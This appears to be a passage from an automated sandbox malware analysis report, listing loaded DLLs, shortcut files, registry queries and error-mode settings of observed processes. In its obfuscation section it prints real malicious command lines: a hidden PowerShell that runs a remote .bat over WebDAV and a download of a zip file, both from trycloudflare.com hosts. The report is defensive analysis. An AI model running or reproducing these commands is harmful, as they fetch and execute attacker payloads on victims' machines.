Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Windows shortcut file (LNK) contains relative path

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Tries to open an application configuration file (.cfg)

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfg

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF64EC64 pushad ; iretd		36_2_00007FF9BF64EC65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6461DA push ds; ret		36_2_00007FF9BF64621F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6442D0 push esp; iretd		36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6442B5 push esp; iretd		36_2_00007FF9BF644319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2D0D0 pushad ; retf		36_2_00007FF9BFB359DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC784A5 pushad ; iretd		36_2_00007FF9BFC784F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC763C5 push edi; iretd		36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC76365 push edi; iretd		36_2_00007FF9BFC763E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7DAF0 push esp; retf		36_2_00007FF9BFC7DAF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7D6DF pushfd ; iretd		36_2_00007FF9BFC7D6E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC784E0 pushad ; iretd		36_2_00007FF9BFC784F2

Boot Survival

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\timeout.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
